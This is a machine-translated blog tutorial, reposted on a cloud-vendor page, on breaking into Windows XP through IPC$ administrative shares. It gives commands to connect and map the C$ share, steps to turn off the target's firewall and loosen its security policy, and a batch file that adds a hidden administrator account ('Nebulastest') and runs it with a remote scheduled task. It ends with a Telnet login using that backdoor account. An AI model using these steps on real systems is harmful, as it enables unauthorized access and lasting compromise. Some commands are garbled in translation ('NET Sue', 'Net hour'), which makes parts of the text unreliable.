Using ipc$ to share intrusion windowsxp combat

Last Update:2015-11-14 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

test Environment: Host (Windows XP SP3) with Windows XP virtual machine)
with ipc$ and windowsxp, there are always problems in the vast majority of XP operating systems today. Here's how to solve a series of problems that arise in establishing ipc$. ipc$ (Internet process connection), usually a lot of the default share of the machine is open! Using the net share command under CMD is not found to have a lot of $, "ipc$ admin$, C $, d$ ..." (Very dangerous).
now get to the point:

1.net use \ \ target ip\ipc$

650) this.width=650; "Src=" http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220675515.jpg " Width= "590" height= "343" style= "Color:rgb (102,102,102); font-family:tahoma;font-size:12px;white-space:normal; Background-color:rgb (255,255,255); "alt=" 200906061244220675515.jpg "/>

53 Error occurred: Unable to find the network path, (the target host opened the system firewall or other firewall software, resolved: Shut down the target firewall)
1326 error occurred:

1) net use \ \ target ip\ipc$ ""/USER: "Administrator" to connect, report the system 1326 error, Login failed: Unknown user name or password error. Check if our command is wrong or the user name is wrong. The results found nothing wrong.

2) in the remote machine "Control Panel-Folder Options-view-Simple File sharing", remove the selection, and then try to connect. Simple File sharing will
The network connection permissions are classified as guest connections, which are not accessible to administrative shares such as ipc$. Results found this error, corrected.

There may be a 1327 error: Login failed: User account limit. Possible causes include not allowing null passwords, login time limits, or enforced policy limits. In the remote machine Control Panel-Administrative Tools-Local Security policy-security options-User Rights Assignment, disable the "Empty password user can only log on console".

650) this.width=650; "Src=" http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220734031.jpg " Width= "399" height= "194" style= "Color:rgb (102,102,102); font-family:tahoma;font-size:12px;white-space:normal; Background-color:rgb (255,255,255); "alt=" 200906061244220734031.jpg "/>

map the other side by default share C drive: net use Z: \ \ target ip\c$

650) this.width=650; "Src=" http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220784312.jpg " Width= "645" height= "368" style= "Color:rgb (102,102,102); font-family:tahoma;font-size:12px;white-space:normal; Background-color:rgb (255,255,255); "alt=" 200906061244220784312.jpg "/>

a network drive will appear in My Computer

650) this.width=650; "Src=" http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220793218.jpg " Width= "578" height= "551" style= "Color:rgb (102,102,102); font-family:tahoma;font-size:12px;white-space:normal; Background-color:rgb (255,255,255); "alt=" 200906061244220793218.jpg "/>

set up ipc$ to end, delete ipc$ connection: NET Sue \ \ target ip\ipc$/del

On this basis, leave the backdoor account on the target computer:
write a batch file and copy it to the other computer, and then increase the scheduled task to execute the batch file;
Batch command: (Save as Adduser.bat)
NET user Nebulastest 123456/add//Add users nebulastest, password 123456
net localgroup Administrators Nebulastest/add//Give administrator permissions for user nebulastest

then execute the command on this machine (the ipc$ connection has already been established): Copy adduser.bat \ \ target ip\c$
then look at the target computer time: Net hour \ \ Destination IP
then add a scheduled task to the target computer: at \ \ Target IP execution time C:\adduser.bat

650) this.width=650; "Src=" http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220806078.jpg " Width= "527" height= "405" style= "Color:rgb (102,102,102); font-family:tahoma;font-size:12px;white-space:normal; Background-color:rgb (255,255,255); "alt=" 200906061244220806078.jpg "/>

Delete the current ipc$ link, use the new user and the new password to establish the ipc$ link to test the time to establish the account success.
net use \ \ target ip\ipc$ "123456"/user: "Nebulastest"

650) this.width=650; "Src=" http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220815484.jpg " Width= "629" height= "156" style= "Color:rgb (102,102,102); font-family:tahoma;font-size:12px;white-space:normal; Background-color:rgb (255,255,255); "alt=" 200906061244220815484.jpg "/>

log in using Telnet :(Prerequisite: The target computer has the Telnet service turned on)

Double-click the Telnet service-----Select automatic-----Click Start

650) this.width=650; "Src=" http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220857437.jpg " Width= "640" height= "412" style= "Color:rgb (102,102,102); font-family:tahoma;font-size:12px;white-space:normal; Background-color:rgb (255,255,255); "alt=" 200906061244220857437.jpg "/>

on the command line input: Telnet destination IP
after the login dialog pops up, select Y, enter the username (backdoor account, password)
entering the password does not now but will automatically verify that the password is correct after carriage return

650) this.width=650; "Src=" http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220884859.jpg " Width= "658" height= "172" style= "Color:rgb (102,102,102); font-family:tahoma;font-size:12px;white-space:normal; Background-color:rgb (255,255,255); "alt=" 200906061244220884859.jpg "/>

The password has been entered but will not be displayed:

650) this.width=650; "Src=" http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220914140.jpg " Width= "533" height= "style=" Color:rgb (102,102,102); font-family:tahoma;font-size:12px;white-space:normal; Background-color:rgb (255,255,255); "alt=" 200906061244220914140.jpg "/>

Post-Login interface:

650) this.width=650; "Src=" http://www.java3z.com/cwbwebhome/article/article9/img9/200906061244220927546.jpg " Width= "585" height= "143" style= "Color:rgb (102,102,102); font-family:tahoma;font-size:12px;white-space:normal; Background-color:rgb (255,255,255); "alt=" 200906061244220927546.jpg "/>

This article is from the "ZPP" blog, make sure to keep this source http://1439337369.blog.51cto.com/10270624/1712719

Using ipc$ to share intrusion windowsxp combat

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

Using ipc$ to share intrusion windowsxp combat

Contact Us

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support